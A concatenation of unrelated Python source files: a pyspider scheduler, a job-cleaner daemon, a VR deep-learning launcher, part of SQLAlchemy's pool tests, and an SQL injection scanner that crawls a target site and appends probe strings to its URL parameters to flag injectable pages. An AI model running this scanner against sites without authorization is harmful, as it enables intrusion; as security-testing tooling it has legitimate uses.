ret = self.on_task_done(task)
else:
ret = self.on_task_failed(task)
if task['track']['fetch'].get('time'):
self._cnt['5m_time'].event((task['project'], 'fetch_time'),
task['track']['fetch']['time'])
if task['track']['process'].get('time'):
self._cnt['5m_time'].event((task['project'], 'process_time'),
task['track']['process'].get('time'))
self.projects[task['project']].active_tasks.appendleft((time.time(), task))
return ret
def init_one(self, ioloop, fetcher, processor,
result_worker=None, interactive=False):
self.ioloop = ioloop
self.fetcher = fetcher
self.processor = processor
self.result_worker = result_worker
self.interactive = interactive
self.running_task = 0
@gen.coroutine
def do_task(self, task):
self.running_task += 1
result = yield gen.Task(self.fetcher.fetch, task)
type, task, response = result.args
self.processor.on_task(task, response)
# do with message
while not self.processor.inqueue.empty():
_task, _response = self.processor.inqueue.get()
self.processor.on_task(_task, _response)
# do with results
while not self.processor.result_queue.empty():
_task, _result = self.processor.result_queue.get()
if self.result_worker:
self.result_worker.on_result(_task, _result)
self.running_task -= 1
def send_task(self, task, force=True):
if self.fetcher.http_client.free_size() <= 0:
if force:
self._send_buffer.appendleft(task)
else:
raise self.outqueue.Full
self.ioloop.add_future(self.do_task(task), lambda x: x.result())
def run(self):
import tornado.ioloop
tornado.ioloop.PeriodicCallback(self.run_once, 100,
io_loop=self.ioloop).start()
self.ioloop.start()
def quit(self):
self.ioloop.stop()
logger.info("scheduler exiting...")
import random
import threading
from pyspider.database.sqlite.sqlitebase import SQLiteMixin
class ThreadBaseScheduler(Scheduler):
def __init__(self, threads=4, *args, **kwargs):
self.local = threading.local()
super(ThreadBaseScheduler, self).__init__(*args, **kwargs)
if isinstance(self.taskdb, SQLiteMixin):
self.threads = 1
else:
self.threads = threads
self._taskdb = self.taskdb
self._projectdb = self.projectdb
self._resultdb = self.resultdb
self.thread_objs = []
self.thread_queues = []
self._start_threads()
assert len(self.thread_queues) > 0
@property
def taskdb(self):
if not hasattr(self.local, 'taskdb'):
self.taskdb = self._taskdb.copy()
return self.local.taskdb
@taskdb.setter
def taskdb(self, taskdb):
self.local.taskdb = taskdb
@property
def projectdb(self):
if not hasattr(self.local, 'projectdb'):
self.projectdb = self._projectdb.copy()
return self.local.projectdb
@projectdb.setter
def projectdb(self, projectdb):
self.local.projectdb = projectdb
@property
def resultdb(self):
if not hasattr(self.local, 'resultdb'):
self.resultdb = self._resultdb.copy()
return self.local.resultdb
@resultdb.setter
def resultdb(self, resultdb):
self.local.resultdb = resultdb
def _start_threads(self):
for i in range(self.threads):
queue = Queue.Queue()
thread = threading.Thread(target=self._thread_worker, args=(queue, ))
thread.daemon = True
thread.start()
self.thread_objs.append(thread)
self.thread_queues.append(queue)
def _thread_worker(self, queue):
while True:
method, args, kwargs = queue.get()
try:
method(*args, **kwargs)
except Exception as e:
logger.exception(e)
def _run_in_thread(self, method, *args, **kwargs):
i = kwargs.pop('_i', None)
block = kwargs.pop('_block', False)
if i is None:
while True:
for queue in self.thread_queues:
if queue.empty():
break
else:
if block:
time.sleep(0.1)
continue
else:
queue = self.thread_queues[random.randint(0, len(self.thread_queues)-1)]
break
else:
queue = self.thread_queues[i % len(self.thread_queues)]
queue.put((method, args, kwargs))
if block:
self._wait_thread()
def _wait_thread(self):
while True:
if all(queue.empty() for queue in self.thread_queues):
break
time.sleep(0.1)
def _update_project(self, project):
self._run_in_thread(Scheduler._update_project, self, project)
def on_task_status(self, task):
i = hash(task['taskid'])
self._run_in_thread(Scheduler.on_task_status, self, task, _i=i)
def on_request(self, task):
i = hash(task['taskid'])
self._run_in_thread(Scheduler.on_request, self, task, _i=i)
def _load_put_task(self, project, taskid):
i = hash(taskid)
self._run_in_thread(Scheduler._load_put_task, self, project, taskid, _i=i)
def run_once(self):
super(ThreadBaseScheduler, self).run_once()
self._wait_thread()
|
SQLInjectionScanner.py | import requests
import re
import difflib
import threading
import queue
import lib.spider.Spider
import time
def info():
info = {
'name': 'sql',
'path': 'SQLInjectionScanner',
'fullname': 'SWEP SQL INJECTION SCANNER',
'description': 'A simple SQL Injection scanner.',
'parameters': {
'Url': 'Target URL.',
'Threads': 'Threads. Default: 10',
'Protocol': 'Protocol. Default: http',
'Timeout': 'Request timeout. Default: 3'
},
'author': 'BERACHER security',
'date': '2019-01-12'
}
return info
class Scanner():
def __init__(self):
self.Url = None
self.Threads = 10
self.Timeout = 3
self._Counter = 0
self._Ratio = 0.9
self.Protocol = 'http'
self.KeywordList = ['w', '\') ','")' , '%23', '--w']
self.Spider = lib.spider.Spider.Spider()
self.differ = difflib.SequenceMatcher()
self.Queue = queue.Queue()
self.Status = True
self.TaskList = []
self.PageList = []
self.UrlList = []
def GetSitePages(self, *PageList):
self.Spider.Url = self.Url
self.Spider.Threads = self.Threads
self.Spider.Protocol = self.Protocol
if PageList:
PageList = PageList[0]
else:
PageList = self.Spider.SpiderSite()
ParmDict = {} # Dict: {url:{arg: val}}
for url in PageList:
try:
url, args = url.split('?')
if args:
parms = args.split('&')
else:
continue
if url not in ParmDict.keys():
ParmDict[url] = {}
for Parm in parms:
arg, val = Parm.split('=')
if arg not in ParmDict[url].keys():
ParmDict[url][arg] = val
print lambda args: ParmDict[url]
except Exception, e:
print '[!] Error: Failed to parse parms: %s' %(str(e))
return ParmDict
def CheckSQLInjection(self):
if not self.PageList:
ParmDict = self.GetSitePages()
else:
ParmDict = self.GetSitePages(self.PageList)
self.Threads = int(self.Threads)
self.Timeout = int(self.Timeout)
for url in ParmDict.keys():
try:
if not self.Url:
print '[!] Error: URL not specified.'
RawUrl = '%s://%s/%s?' %(self.Protocol, self.Url, url)
PayloadList = self.GenPayload(RawUrl, ParmDict[url]) # {url:{parm:keyword}}
self.Queue.put(PayloadList)
except Exception, e:
print '[!] Error generating payload: %s' %(str(e))
taskchecker = threading.Thread(target=self.ThreadChecker)
taskchecker.setDaemon(True)
self.Status = True
taskchecker.start()
try:
while self.Queue.qsize():
if self.Threads > len(self.TaskList):
thread = threading.Thread(target=self.CheckVunerability, args=[self.Queue.get()])
thread.start()
self.TaskList.append(thread)
if not self.Queue.qsize():
print '[*] Scan completed, synchronizing threads.'
for item in self.TaskList:
item.join()
break
except KeyboardInterrupt:
print '[*] Keyboard interrupt, Quitting.'
except Exception, e:
print '[!] Error checking SQL injection: %s' %(str(e))
self.Status = False
return self.UrlList
def GenPayload(self, url, Payloads): # Gen payload: first parm, second parm, both parm
RawUrl = url
PayloadList = []
for parm in Payloads.keys():
value = Payloads[parm]
url += '%s=%s&' %(parm, value)
url = url.rstrip('&')
for Keyword in self.KeywordList:
Payload = RawUrl
for parm in Payloads.keys():
value = Payloads[parm]
Payload += '%s=%s%s&' %(parm, value, Keyword)
Payload = Payload.rstrip('&')
PayloadList.append(Payload)
PayloadDict = {url:PayloadList}
return PayloadDict
def CheckVunerability(self, UrlDict): # Check page keyword, if not then diffrence.
for raw in UrlDict.keys():
try:
RawResp = requests.get(raw, timeout=self.Timeout).text
except Exception, e:
print '[!] Failed to fetch raw page: %s' %(str(e))
continue
try:
for payload in UrlDict[raw]:
resp = requests.get(payload, timeout=self.Timeout)
self.differ.set_seqs(RawResp, resp.text)
if resp.status_code == 500:
print '[*] %s seems vulnerable to SQL injection: Status code.' %(str(payload))
elif re.findall('Error|SQL Error|sql|database|Syntax|Error \d{4} .*|\(\d{6}\)|failed|You have an error in your SQL syntax', resp.text, re.I):
print '[*] %s seems vulnerable to SQL injection: Keyword.' %(str(payload))
elif self.differ.ratio() < self._Ratio:
print '[*] %s seems vulnerable to SQL injection: ratio' %(str(payload))
else:
pass
self.UrlList.append(payload)
except Exception, e:
print '[!] Error checking vulnerability: %s' %(str(e))
pass
return self.UrlList
def Scan(self):
if not self.Url:
print '[!] URL not specified.'
return
if not self.Timeout:
print '[*] Timeout not specified, using 3 by default.'
self.Timeout = 3
else:
self.Timeout = int(self.Timeout)
UrlList = self.CheckSQLInjection()
return UrlList
def ThreadChecker(self):
time.sleep(1)
while self.Status:
for item in self.TaskList:
if not item.isAlive():
self.TaskList.remove(item)
del item
return
def info(self):
InformationList = info()
args = InformationList['parameters']
print '[*] Incoming scanner information:'
print '[*] Scanner name: %s' %(InformationList['name'])
print ' | %s' %(InformationList['fullname'])
print ' | Description: %s' %(InformationList['description'])
print ' | Author: %s' %(InformationList['author'])
print ' | Date: %s' %(InformationList['date'])
print ' | Arguments: Total %i' %(len(args))
print ' | | NAME DESCRIPTION'
print ' | | ---- `-----------'
for item in args.keys():
print ' | | %s%s' %(item.ljust(12), args[item])
print ' |'
print '[*] Scanner information end.'
def test():
scanner = Scanner()
scanner.Url = ''
scanner.Scan()
|
job_cleaner_daemon.py | import time
import threading
from broker.utils.accumulated_sum_linked_list import AccumulatedSumLinkedList
class JobCleanerDaemon():
def __init__(self, submissions):
self.submissions = submissions
self.queue = AccumulatedSumLinkedList()
self.thread = None
self.active = False
def start_delete_resources_management(self):
while not self.queue.is_empty():
time.sleep(1)
self.queue.head.value.remaining_time -= 1
if self.queue.head.value.remaining_time <= 0:
jobs_finished_ids = self.queue.pop().value.get_app_ids()
for job_id in jobs_finished_ids:
job = self.submissions[job_id]
job.delete_job_resources()
self.active = False
def insert_element(self, app_id, time):
element = JobRepr(app_id, time)
self.queue.insert(element)
if not self.active:
self.active = True
self.start_thread()
def start_thread(self):
self.thread = \
threading.Thread(target=self.start_delete_resources_management)
self.thread.daemon = True
self.thread.start()
class JobRepr():
def __init__(self, app_id, remaining_time):
self.remaining_time = remaining_time
self.app_ids = [app_id]
def get_app_ids(self):
return self.app_ids
def get_remaining_time(self):
return self.remaining_time
def set_remaining_time(self, new_remaining_time):
self.remaining_time = new_remaining_time
def __repr__(self):
return str(self.app_ids) + ": " + str(self.remaining_time) + " sec"
|
local_vrdl.py | """
Copyright © 2020, University of Texas Southwestern Medical Center. All rights reserved.
Contributors: Kevin VanHorn, Meyer Zinn, Murat Can Cobanoglu
Department: Lyda Hill Department of Bioinformatics.
This software and any related documentation constitutes published and/or unpublished works and may contain valuable trade secrets and proprietary information belonging to The University of Texas Southwestern Medical Center (UT SOUTHWESTERN). None of the foregoing material may be copied, duplicated or disclosed without the express written permission of UT SOUTHWESTERN. IN NO EVENT SHALL UT SOUTHWESTERN BE LIABLE TO ANY PARTY FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES, INCLUDING LOST PROFITS, ARISING OUT OF THE USE OF THIS SOFTWARE AND ITS DOCUMENTATION, EVEN IF UT SOUTHWESTERN HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. UT SOUTHWESTERN SPECIFICALLY DISCLAIMS ANY WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE SOFTWARE AND ACCOMPANYING DOCUMENTATION, IF ANY, PROVIDED HEREUNDER IS PROVIDED "AS IS". UT SOUTHWESTERN HAS NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS.
This software contains copyrighted materials from Oculus, Unity Technologies, Keras, TensorFlow, gRPC, NumPy, Matplotlib, OpenCV, Pyprind, Nvidia CUDA, wiki.unity3d.com, PyCharm, Visual Studio Community, and Google. Corresponding terms and conditions apply.
"""
"""
vrdl.py (Virtual Reality Deep Learning)
Hub program that spawns and handles communication between a server and evaluator.
"""
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ['CUDA_VISIBLE_DEVICES'] = "0"#"-1"
from evaluator import main as evaluator_main
from evaluator import GPUSpawnerPersistent as spawner
from data_manager import DataManager
from local_server import Server
from multiprocessing import Process
NUM_FOLDS = 10 # Number of times to test the model for k-fold stratification.
NUM_GPUS = 3 # Spawns k persistent threads (1 per GPU).
if __name__ == '__main__':
# Spawn a server and evaluator, connectors are in order ("in", "out") internally
dm = DataManager(NUM_FOLDS)
eval = evaluator_main(NUM_GPUS, NUM_FOLDS, dm)
server = Process(target=Server, args=(dm, eval))
server.start()
try:
server.join()
except KeyboardInterrupt:
print("\t vrdl on exit.")
eval.on_exit()
|
test_pool.py | import collections
import random
import threading
import time
import weakref
import sqlalchemy as tsa
from sqlalchemy import event
from sqlalchemy import pool
from sqlalchemy import select
from sqlalchemy import testing
from sqlalchemy.engine import default
from sqlalchemy.pool.base import _AsyncConnDialect
from sqlalchemy.pool.base import _ConnDialect
from sqlalchemy.testing import assert_raises
from sqlalchemy.testing import assert_raises_context_ok
from sqlalchemy.testing import assert_raises_message
from sqlalchemy.testing import eq_
from sqlalchemy.testing import expect_raises
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import is_
from sqlalchemy.testing import is_none
from sqlalchemy.testing import is_not
from sqlalchemy.testing import is_not_none
from sqlalchemy.testing import is_true
from sqlalchemy.testing import mock
from sqlalchemy.testing.engines import testing_engine
from sqlalchemy.testing.mock import ANY
from sqlalchemy.testing.mock import call
from sqlalchemy.testing.mock import Mock
from sqlalchemy.testing.mock import patch
from sqlalchemy.testing.util import gc_collect
from sqlalchemy.testing.util import lazy_gc
join_timeout = 10
def MockDBAPI(): # noqa
def cursor():
return Mock()
def connect(*arg, **kw):
def close():
conn.closed = True
# mock seems like it might have an issue logging
# call_count correctly under threading, not sure.
# adding a side_effect for close seems to help.
conn = Mock(
cursor=Mock(side_effect=cursor),
close=Mock(side_effect=close),
closed=False,
)
return conn
def shutdown(value):
if value:
db.connect = Mock(side_effect=Exception("connect failed"))
else:
db.connect = Mock(side_effect=connect)
db.is_shutdown = value
db = Mock(
connect=Mock(side_effect=connect), shutdown=shutdown, is_shutdown=False
)
return db
class PoolTestBase(fixtures.TestBase):
def setup_test(self):
pool.clear_managers()
self._teardown_conns = []
def teardown_test(self):
for ref in self._teardown_conns:
conn = ref()
if conn:
conn.close()
@classmethod
def teardown_test_class(cls):
pool.clear_managers()
def _with_teardown(self, connection):
self._teardown_conns.append(weakref.ref(connection))
return connection
def _queuepool_fixture(self, **kw):
dbapi, pool = self._queuepool_dbapi_fixture(**kw)
return pool
def _queuepool_dbapi_fixture(self, **kw):
dbapi = MockDBAPI()
_is_asyncio = kw.pop("_is_asyncio", False)
p = pool.QueuePool(creator=lambda: dbapi.connect("foo.db"), **kw)
if _is_asyncio:
p._is_asyncio = True
p._dialect = _AsyncConnDialect()
return dbapi, p
class PoolTest(PoolTestBase):
@testing.fails_on(
"+pyodbc", "pyodbc cursor doesn't implement tuple __eq__"
)
@testing.fails_on("+pg8000", "returns [1], not (1,)")
def test_cursor_iterable(self):
conn = testing.db.raw_connection()
cursor = conn.cursor()
cursor.execute(str(select(1).compile(testing.db)))
expected = [(1,)]
for row in cursor:
eq_(row, expected.pop(0))
def test_no_connect_on_recreate(self):
def creator():
raise Exception("no creates allowed")
for cls in (
pool.SingletonThreadPool,
pool.StaticPool,
pool.QueuePool,
pool.NullPool,
pool.AssertionPool,
):
p = cls(creator=creator)
p.dispose()
p2 = p.recreate()
assert p2.__class__ is cls
mock_dbapi = MockDBAPI()
p = cls(creator=mock_dbapi.connect)
conn = p.connect()
conn.close()
mock_dbapi.connect.side_effect = Exception("error!")
p.dispose()
p.recreate()
def test_info(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c = p.connect()
self.assert_(not c.info)
self.assert_(c.info is c._connection_record.info)
c.info["foo"] = "bar"
c.close()
del c
c = p.connect()
self.assert_("foo" in c.info)
c.invalidate()
c = p.connect()
self.assert_("foo" not in c.info)
c.info["foo2"] = "bar2"
c.detach()
self.assert_("foo2" in c.info)
c2 = p.connect()
is_not(c.dbapi_connection, c2.dbapi_connection)
assert not c2.info
assert "foo2" in c.info
def test_rec_info(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c = p.connect()
self.assert_(not c.record_info)
self.assert_(c.record_info is c._connection_record.record_info)
c.record_info["foo"] = "bar"
c.close()
del c
c = p.connect()
self.assert_("foo" in c.record_info)
c.invalidate()
c = p.connect()
self.assert_("foo" in c.record_info)
c.record_info["foo2"] = "bar2"
c.detach()
is_(c.record_info, None)
is_(c._connection_record, None)
c2 = p.connect()
assert c2.record_info
assert "foo2" in c2.record_info
def test_rec_unconnected(self):
# test production of a _ConnectionRecord with an
# initially unconnected state.
dbapi = MockDBAPI()
p1 = pool.Pool(creator=lambda: dbapi.connect("foo.db"))
r1 = pool._ConnectionRecord(p1, connect=False)
assert not r1.dbapi_connection
c1 = r1.get_connection()
is_(c1, r1.dbapi_connection)
is_(c1, r1.connection)
is_(c1, r1.driver_connection)
def test_rec_close_reopen(self):
# test that _ConnectionRecord.close() allows
# the record to be reusable
dbapi = MockDBAPI()
p1 = pool.Pool(creator=lambda: dbapi.connect("foo.db"))
r1 = pool._ConnectionRecord(p1)
c1 = r1.dbapi_connection
c2 = r1.get_connection()
is_(c1, c2)
r1.close()
assert not r1.dbapi_connection
eq_(c1.mock_calls, [call.close()])
c2 = r1.get_connection()
is_not(c1, c2)
is_(c2, r1.dbapi_connection)
eq_(c2.mock_calls, [])
@testing.combinations(
(
pool.QueuePool,
dict(pool_size=8, max_overflow=10, timeout=25, use_lifo=True),
),
(pool.QueuePool, {}),
(pool.NullPool, {}),
(pool.SingletonThreadPool, {}),
(pool.StaticPool, {}),
(pool.AssertionPool, {}),
)
def test_recreate_state(self, pool_cls, pool_args):
creator = object()
pool_args["pre_ping"] = True
pool_args["reset_on_return"] = "commit"
pool_args["recycle"] = 35
pool_args["logging_name"] = "somepool"
pool_args["dialect"] = default.DefaultDialect()
pool_args["echo"] = "debug"
p1 = pool_cls(creator=creator, **pool_args)
cls_keys = dir(pool_cls)
d1 = dict(p1.__dict__)
p2 = p1.recreate()
d2 = dict(p2.__dict__)
for k in cls_keys:
d1.pop(k, None)
d2.pop(k, None)
for k in (
"_invoke_creator",
"_pool",
"_overflow_lock",
"_fairy",
"_conn",
"logger",
):
if k in d2:
d2[k] = mock.ANY
eq_(d1, d2)
eq_(p1.echo, p2.echo)
is_(p1._dialect, p2._dialect)
if "use_lifo" in pool_args:
eq_(p1._pool.use_lifo, p2._pool.use_lifo)
@testing.combinations(
(pool.QueuePool, False),
(pool.AsyncAdaptedQueuePool, True),
(pool.FallbackAsyncAdaptedQueuePool, True),
(pool.NullPool, None),
(pool.SingletonThreadPool, False),
(pool.StaticPool, None),
(pool.AssertionPool, None),
)
def test_is_asyncio_from_dialect(self, pool_cls, is_async_kind):
p = pool_cls(creator=object())
for is_async in (True, False):
if is_async:
p._dialect = _AsyncConnDialect()
else:
p._dialect = _ConnDialect()
if is_async_kind is None:
eq_(p._is_asyncio, is_async)
else:
eq_(p._is_asyncio, is_async_kind)
@testing.combinations(
(pool.QueuePool, False),
(pool.AsyncAdaptedQueuePool, True),
(pool.FallbackAsyncAdaptedQueuePool, True),
(pool.NullPool, False),
(pool.SingletonThreadPool, False),
(pool.StaticPool, False),
(pool.AssertionPool, False),
)
def test_is_asyncio_from_dialect_cls(self, pool_cls, is_async):
eq_(pool_cls._is_asyncio, is_async)
def test_rec_fairy_default_dialect(self):
dbapi = MockDBAPI()
p1 = pool.Pool(creator=lambda: dbapi.connect("foo.db"))
rec = pool._ConnectionRecord(p1)
is_not_none(rec.dbapi_connection)
is_(rec.connection, rec.dbapi_connection)
is_(rec.driver_connection, rec.dbapi_connection)
fairy = pool._ConnectionFairy(rec.dbapi_connection, rec, False)
is_not_none(fairy.dbapi_connection)
is_(fairy.connection, fairy.dbapi_connection)
is_(fairy.driver_connection, fairy.dbapi_connection)
is_(fairy.dbapi_connection, rec.dbapi_connection)
is_(fairy.driver_connection, rec.driver_connection)
def test_rec_fairy_adapted_dialect(self):
dbapi = MockDBAPI()
mock_dc = object()
class _AdaptedDialect(_ConnDialect):
def get_driver_connection(self, connection):
return mock_dc
p1 = pool.Pool(
creator=lambda: dbapi.connect("foo.db"), dialect=_AdaptedDialect()
)
rec = pool._ConnectionRecord(p1)
is_not_none(rec.dbapi_connection)
is_(rec.connection, rec.dbapi_connection)
is_(rec.driver_connection, mock_dc)
fairy = pool._ConnectionFairy(rec.dbapi_connection, rec, False)
is_not_none(fairy.dbapi_connection)
is_(fairy.connection, fairy.dbapi_connection)
is_(fairy.driver_connection, mock_dc)
is_(fairy.dbapi_connection, rec.dbapi_connection)
is_(fairy.driver_connection, mock_dc)
def test_connection_setter(self):
dbapi = MockDBAPI()
p1 = pool.Pool(creator=lambda: dbapi.connect("foo.db"))
rec = pool._ConnectionRecord(p1)
is_not_none(rec.dbapi_connection)
is_(rec.connection, rec.dbapi_connection)
rec.connection = 42
is_(rec.connection, rec.dbapi_connection)
rec.dbapi_connection = 99
is_(rec.connection, rec.dbapi_connection)
class PoolDialectTest(PoolTestBase):
def _dialect(self):
canary = []
class PoolDialect(object):
is_async = False
def do_rollback(self, dbapi_connection):
canary.append("R")
dbapi_connection.rollback()
def do_commit(self, dbapi_connection):
canary.append("C")
dbapi_connection.commit()
def do_close(self, dbapi_connection):
canary.append("CL")
dbapi_connection.close()
def get_driver_connection(self, connection):
return connection
return PoolDialect(), canary
def _do_test(self, pool_cls, assertion):
mock_dbapi = MockDBAPI()
dialect, canary = self._dialect()
p = pool_cls(creator=mock_dbapi.connect)
p._dialect = dialect
conn = p.connect()
conn.close()
p.dispose()
p.recreate()
conn = p.connect()
conn.close()
eq_(canary, assertion)
def test_queue_pool(self):
self._do_test(pool.QueuePool, ["R", "CL", "R"])
def test_assertion_pool(self):
self._do_test(pool.AssertionPool, ["R", "CL", "R"])
def test_singleton_pool(self):
self._do_test(pool.SingletonThreadPool, ["R", "CL", "R"])
def test_null_pool(self):
self._do_test(pool.NullPool, ["R", "CL", "R", "CL"])
def test_static_pool(self):
self._do_test(pool.StaticPool, ["R", "CL", "R"])
class PoolEventsTest(PoolTestBase):
def _first_connect_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def first_connect(*arg, **kw):
canary.append("first_connect")
event.listen(p, "first_connect", first_connect)
return p, canary
def _connect_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def connect(*arg, **kw):
canary.append("connect")
event.listen(p, "connect", connect)
return p, canary
def _checkout_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def checkout(*arg, **kw):
canary.append("checkout")
event.listen(p, "checkout", checkout)
return p, canary
def _checkin_event_fixture(self, _is_asyncio=False):
p = self._queuepool_fixture(_is_asyncio=_is_asyncio)
canary = []
@event.listens_for(p, "checkin")
def checkin(*arg, **kw):
canary.append("checkin")
@event.listens_for(p, "close_detached")
def close_detached(*arg, **kw):
canary.append("close_detached")
@event.listens_for(p, "detach")
def detach(*arg, **kw):
canary.append("detach")
return p, canary
def _reset_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def reset(*arg, **kw):
canary.append("reset")
event.listen(p, "reset", reset)
return p, canary
def _invalidate_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "invalidate", canary)
return p, canary
def _soft_invalidate_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "soft_invalidate", canary)
return p, canary
def _close_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "close", canary)
return p, canary
def _detach_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "detach", canary)
return p, canary
def _close_detached_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "close_detached", canary)
return p, canary
def test_close(self):
p, canary = self._close_event_fixture()
c1 = p.connect()
connection = c1.dbapi_connection
rec = c1._connection_record
c1.close()
eq_(canary.mock_calls, [])
p.dispose()
eq_(canary.mock_calls, [call(connection, rec)])
def test_detach(self):
p, canary = self._detach_event_fixture()
c1 = p.connect()
connection = c1.dbapi_connection
rec = c1._connection_record
c1.detach()
eq_(canary.mock_calls, [call(connection, rec)])
def test_detach_close(self):
p, canary = self._close_detached_event_fixture()
c1 = p.connect()
connection = c1.dbapi_connection
c1.detach()
c1.close()
eq_(canary.mock_calls, [call(connection)])
def test_first_connect_event(self):
p, canary = self._first_connect_event_fixture()
p.connect()
eq_(canary, ["first_connect"])
def test_first_connect_event_fires_once(self):
p, canary = self._first_connect_event_fixture()
p.connect()
p.connect()
eq_(canary, ["first_connect"])
def test_first_connect_on_previously_recreated(self):
p, canary = self._first_connect_event_fixture()
p2 = p.recreate()
p.connect()
p2.connect()
eq_(canary, ["first_connect", "first_connect"])
def test_first_connect_on_subsequently_recreated(self):
p, canary = self._first_connect_event_fixture()
p.connect()
p2 = p.recreate()
p2.connect()
eq_(canary, ["first_connect", "first_connect"])
def test_connect_event(self):
p, canary = self._connect_event_fixture()
p.connect()
eq_(canary, ["connect"])
def test_connect_insert_event(self):
p = self._queuepool_fixture()
canary = []
def connect_one(*arg, **kw):
canary.append("connect_one")
def connect_two(*arg, **kw):
canary.append("connect_two")
def connect_three(*arg, **kw):
canary.append("connect_three")
event.listen(p, "connect", connect_one)
event.listen(p, "connect", connect_two, insert=True)
event.listen(p, "connect", connect_three)
p.connect()
eq_(canary, ["connect_two", "connect_one", "connect_three"])
def test_connect_event_fires_subsequent(self):
p, canary = self._connect_event_fixture()
c1 = p.connect() # noqa
c2 = p.connect() # noqa
eq_(canary, ["connect", "connect"])
def test_connect_on_previously_recreated(self):
p, canary = self._connect_event_fixture()
p2 = p.recreate()
p.connect()
p2.connect()
eq_(canary, ["connect", "connect"])
def test_connect_on_subsequently_recreated(self):
p, canary = self._connect_event_fixture()
p.connect()
p2 = p.recreate()
p2.connect()
eq_(canary, ["connect", "connect"])
def test_checkout_event(self):
p, canary = self._checkout_event_fixture()
p.connect()
eq_(canary, ["checkout"])
def test_checkout_event_fires_subsequent(self):
p, canary = self._checkout_event_fixture()
p.connect()
p.connect()
eq_(canary, ["checkout", "checkout"])
def test_checkout_event_on_subsequently_recreated(self):
p, canary = self._checkout_event_fixture()
p.connect()
p2 = p.recreate()
p2.connect()
eq_(canary, ["checkout", "checkout"])
def test_checkin_event(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
eq_(canary, [])
c1.close()
eq_(canary, ["checkin"])
def test_reset_event(self):
p, canary = self._reset_event_fixture()
c1 = p.connect()
eq_(canary, [])
c1.close()
eq_(canary, ["reset"])
def test_soft_invalidate_event_no_exception(self):
p, canary = self._soft_invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.dbapi_connection
c1.invalidate(soft=True)
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is None
def test_soft_invalidate_event_exception(self):
p, canary = self._soft_invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.dbapi_connection
exc = Exception("hi")
c1.invalidate(exc, soft=True)
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is exc
def test_invalidate_event_no_exception(self):
p, canary = self._invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.dbapi_connection
c1.invalidate()
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is None
def test_invalidate_event_exception(self):
p, canary = self._invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.dbapi_connection
exc = Exception("hi")
c1.invalidate(exc)
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is exc
@testing.combinations((True,), (False,))
def test_checkin_event_gc(self, detach_gced):
p, canary = self._checkin_event_fixture(_is_asyncio=detach_gced)
c1 = p.connect()
dbapi_connection = weakref.ref(c1.dbapi_connection)
eq_(canary, [])
del c1
lazy_gc()
if detach_gced:
# "close_detached" is not called because for asyncio the
# connection is just lost.
eq_(canary, ["detach"])
else:
eq_(canary, ["checkin"])
gc_collect()
if detach_gced:
is_none(dbapi_connection())
else:
is_not_none(dbapi_connection())
def test_checkin_event_on_subsequently_recreated(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, [])
c1.close()
eq_(canary, ["checkin"])
c2.close()
eq_(canary, ["checkin", "checkin"])
def test_listen_targets_scope(self):
canary = []
def listen_one(*args):
canary.append("listen_one")
def listen_two(*args):
canary.append("listen_two")
def listen_three(*args):
canary.append("listen_three")
def listen_four(*args):
canary.append("listen_four")
engine = testing_engine(testing.db.url)
event.listen(pool.Pool, "connect", listen_one)
event.listen(engine.pool, "connect", listen_two)
event.listen(engine, "connect", listen_three)
event.listen(engine.__class__, "connect", listen_four)
with engine.connect() as conn:
conn.execute(select(1))
eq_(
canary, ["listen_one", "listen_four", "listen_two", "listen_three"]
)
def test_listen_targets_per_subclass(self):
"""test that listen() called on a subclass remains specific to
that subclass."""
canary = []
def listen_one(*args):
canary.append("listen_one")
def listen_two(*args):
canary.append("listen_two")
def listen_three(*args):
canary.append("listen_three")
event.listen(pool.Pool, "connect", listen_one)
event.listen(pool.QueuePool, "connect", listen_two)
event.listen(pool.SingletonThreadPool, "connect", listen_three)
p1 = pool.QueuePool(creator=MockDBAPI().connect)
p2 = pool.SingletonThreadPool(creator=MockDBAPI().connect)
assert listen_one in p1.dispatch.connect
assert listen_two in p1.dispatch.connect
assert listen_three not in p1.dispatch.connect
assert listen_one in p2.dispatch.connect
assert listen_two not in p2.dispatch.connect
assert listen_three in p2.dispatch.connect
p1.connect()
eq_(canary, ["listen_one", "listen_two"])
p2.connect()
eq_(canary, ["listen_one", "listen_two", "listen_one", "listen_three"])
def test_connect_event_fails_invalidates(self):
fail = False
def listen_one(conn, rec):
if fail:
raise Exception("it failed")
def listen_two(conn, rec):
rec.info["important_flag"] = True
p1 = pool.QueuePool(
creator=MockDBAPI().connect, pool_size=1, max_overflow=0
)
